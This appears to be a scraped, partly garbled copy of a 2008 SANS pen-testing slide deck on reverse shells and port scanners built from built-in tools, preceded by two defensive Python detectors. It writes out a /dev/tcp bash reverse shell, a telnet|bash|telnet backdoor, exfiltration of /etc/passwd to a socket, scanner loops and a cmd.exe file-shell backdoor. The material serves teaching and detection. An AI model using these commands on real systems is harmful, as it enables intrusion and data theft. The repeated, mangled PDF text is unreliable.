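The shell tricks in slides 16 through 22 (redirecting into /dev/tcp, the bash -i reverse shell, the echo port probe and its while-loop scanner, and the telnet | /bin/bash | telnet pipeline) all leave a recognisable shape in bash history or in auditd EXECVE records. As an added example that is not part of the webcast, the Python below classifies command lines by those shapes: it splits a pipeline into its stages and looks for a shell sandwiched between two network clients, and it separates a /dev/tcp probe from a /dev/tcp reverse shell by whether stdin is duplicated from the socket (0<&1). The sample command lines, the rule names and the small sets of shell and client names are constructed for this example.

```python
"""Flag shell command lines that use the /dev/tcp and "reverse telnet" tricks
from the slides above.  Added defender-side example; the sample command lines
are constructed and the rule names are my own, not a vendor's."""
import re
import shlex
from dataclasses import dataclass

# /dev/tcp/<host>/<port> (or /dev/udp); the port may be a literal or a $variable
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/[^\s;|)]+")
# "echo > /dev/tcp/..." is the single-port probe the slides use as a scanner
PROBE = re.compile(r"\becho\s*>\s*/dev/(?:tcp|udp)/")
# stdin duplicated from the socket: the reverse-shell redirection
STDIN_FROM_SOCKET = re.compile(r"(?<!\S)0<&1(?!\S)")
# a single "|" (not "||"), used to split pipeline stages before tokenising
SINGLE_PIPE = re.compile(r"(?<!\|)\|(?!\|)")

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
NET_CLIENTS = {"telnet", "nc", "ncat", "netcat"}


@dataclass(frozen=True)
class Finding:
    rule: str
    command: str


def pipeline_heads(command):
    """Return the first word (basename) of each stage of a shell pipeline."""
    spaced = SINGLE_PIPE.sub(" | ", command)
    try:
        tokens = shlex.split(spaced)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        tokens = spaced.split()
    heads, at_start = [], True
    for tok in tokens:
        if tok == "|":
            at_start = True
        elif at_start:
            heads.append(tok.rsplit("/", 1)[-1])
            at_start = False
    return heads


def classify(command):
    """Return the Findings for one command line (empty list if nothing matched)."""
    findings = []
    heads = pipeline_heads(command)
    if DEV_TCP.search(command):
        if STDIN_FROM_SOCKET.search(command) and any(h in SHELLS for h in heads):
            findings.append(Finding("reverse_shell_dev_tcp", command))
        elif PROBE.search(command):
            findings.append(Finding("dev_tcp_port_probe", command))
        else:
            findings.append(Finding("dev_tcp_redirect", command))
    # a shell sandwiched between two network clients: telnet | bash | telnet
    for k in range(1, len(heads) - 1):
        if heads[k] in SHELLS and heads[k - 1] in NET_CLIENTS and heads[k + 1] in NET_CLIENTS:
            findings.append(Finding("shell_between_net_clients", command))
            break
    return findings


def scan(commands):
    """Classify every command line; returns a list of (rule, command) tuples."""
    return [(f.rule, f.command) for c in commands for f in classify(c)]


# Constructed sample command lines (as they might appear in bash history or an
# auditd EXECVE record): one per technique on the slides, plus two benign lines.
SAMPLE_COMMANDS = [
    "cat /etc/passwd > /dev/tcp/192.0.2.10/4444",
    "/bin/bash -i > /dev/tcp/192.0.2.10/4444 0<&1 2>&1",
    "echo > /dev/tcp/192.0.2.20/80",
    "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/192.0.2.20/$port; "
    "[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done",
    "telnet 192.0.2.10 4444 | /bin/bash | telnet 192.0.2.10 4445",
    "ls -la /var/log | grep auth",
    "echo hello > /tmp/greeting.txt",
]

if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_COMMANDS):
        print(f"{rule:28} {cmd}")
```

The pipeline-shape rule is deliberately broader than the slide's exact telnet wording, since any pair of network clients around a shell gives the same two-channel backdoor; tune SHELLS and NET_CLIENTS to the interpreters and clients actually installed on the hosts you monitor.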
Slide 23: Reverse Telnet Shell in Action
Slide 24: Windows
• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Slide 25: Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work... we won't go through them again here
Slide 26: Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it... When it stops, hit CTRL-[ and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
Slide 27: More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs... No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way
Slide 28: Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line... only connects to TCP port 21
• Solution: But you can specify the dest port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
Slide 29: The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Slide 30: Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Slide 31: Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
    C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
Slide 32: File Transfer in Action
Slide 33: Backdoors: The File Shell
• Now let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
    C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Slide 34: Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
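The Windows tricks in slides 26 through 34 are hard to spot by command-line text alone, because every launch looks like an ordinary ftp.exe, telnet.exe or ping.exe run. What gives them away is the shape of the process tree over time: the FOR /L port scanners produce a burst of ftp.exe or telnet.exe children from a single cmd.exe within seconds, and the file shell (and the telnet-killing loop) keep spawning ping -n N 127.0.0.1 as cmd.exe's stand-in for sleep. As an added example that is not part of the webcast, the Python below runs a sliding-window burst detector and a ping-as-sleep detector over constructed process-creation events; the pipe-separated event format, the pids and the thresholds are my own choices and not Sysmon's real schema.

```python
"""Spot the process-creation shape of the Windows FOR-loop tricks from the
slides: a burst of ftp.exe/telnet.exe launches from one cmd.exe (the port
scanners) and a cmd.exe that keeps spawning "ping -n N 127.0.0.1" as a sleep
between commands (the file shell).  Added example; the event format is a
constructed pipe-separated line, not Sysmon's real schema."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    parent_pid: int
    parent_image: str
    image: str
    command_line: str


def parse_event(line):
    """Parse 'ISO-timestamp|parent_pid|parent_image|image|command_line'."""
    ts, ppid, parent, image, cmd = line.split("|", 4)
    return ProcEvent(datetime.fromisoformat(ts), int(ppid), parent, image, cmd)


SCANNER_IMAGES = {"ftp.exe", "telnet.exe"}
BURST_WINDOW = timedelta(seconds=60)
BURST_THRESHOLD = 20          # launches of a scanner image inside the window


def detect_scan_bursts(events):
    """Return [(parent_pid, count)] for parents that launched ftp.exe or
    telnet.exe at least BURST_THRESHOLD times within BURST_WINDOW."""
    by_parent = defaultdict(list)
    for e in events:
        if e.image.lower() in SCANNER_IMAGES:
            by_parent[e.parent_pid].append(e.ts)
    hits = []
    for ppid, times in by_parent.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over launch times
            while t - times[start] > BURST_WINDOW:
                start += 1
            if end - start + 1 >= BURST_THRESHOLD:
                hits.append((ppid, end - start + 1))
                break
    return hits


MIN_PINGS = 5                 # loopback pings from one parent before we care


def detect_ping_sleep_loops(events):
    """Return [(parent_pid, pings, other_children)] for parents that repeatedly
    spawn ping against 127.0.0.1.  A quiet file shell spawns only pings, so
    other_children may be 0; it is reported to help triage, not as a filter."""
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e.parent_pid].append(e)
    hits = []
    for ppid, children in by_parent.items():
        pings = [c for c in children
                 if c.image.lower() == "ping.exe" and "127.0.0.1" in c.command_line]
        others = [c for c in children if c.image.lower() != "ping.exe"]
        if len(pings) >= MIN_PINGS:
            hits.append((ppid, len(pings), len(others)))
    return hits


def build_sample_events():
    """Constructed sample: a 25-port ftp.exe scan from pid 1200, a file-shell
    polling loop under pid 1300, and one benign ftp.exe launch under pid 1400."""
    base = datetime(2008, 8, 14, 10, 0, 0)
    lines = []
    for k in range(25):                       # one ftp.exe every two seconds
        ts = (base + timedelta(seconds=2 * k)).isoformat()
        lines.append(f"{ts}|1200|cmd.exe|ftp.exe|ftp -s:ftp.txt")
    for k in range(6):                        # ping sleep, then a command, repeat
        ts_ping = (base + timedelta(seconds=6 * k)).isoformat()
        ts_cmd = (base + timedelta(seconds=6 * k + 3)).isoformat()
        lines.append(f"{ts_ping}|1300|cmd.exe|ping.exe|ping -n 2 127.0.0.1")
        lines.append(f"{ts_cmd}|1300|cmd.exe|cmd.exe|cmd.exe /c ipconfig /all")
    lines.append(f"{base.isoformat()}|1400|explorer.exe|ftp.exe|ftp files.example.net")
    return [parse_event(line) for line in lines]


if __name__ == "__main__":
    evs = build_sample_events()
    print("scan bursts:", detect_scan_bursts(evs))
    print("ping-sleep loops:", detect_ping_sleep_loops(evs))
```

Both detectors key on the parent pid rather than on the command text, which is why they survive renamed files or a different port range; the thresholds are starting points and should be set from a baseline of how often legitimate scripts on your hosts launch ftp.exe or ping the loopback address.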
Slide 35: The File Shell In Action
Slide 36: Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Slide 37: Conclusions
• Netcat without Netcat shows that with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Slide 38: Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code PENTEST20
• Discount applies to the 560 course through August
  – June 4-9: Las Vegas, NV (Skoudis)
  – June 12-July 22: Home On-Line (Skoudis)
  – July 24-29: Wash DC (Skoudis)
  – Aug 11-16: Boston (Shackleford)
  – Aug 18-23: Minneapolis (Conrad)
  – Aug 24-29: Va Beach (Strand)
• Go to www.sans.org and look for "560" for details
Page 17
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 18
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify dest port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
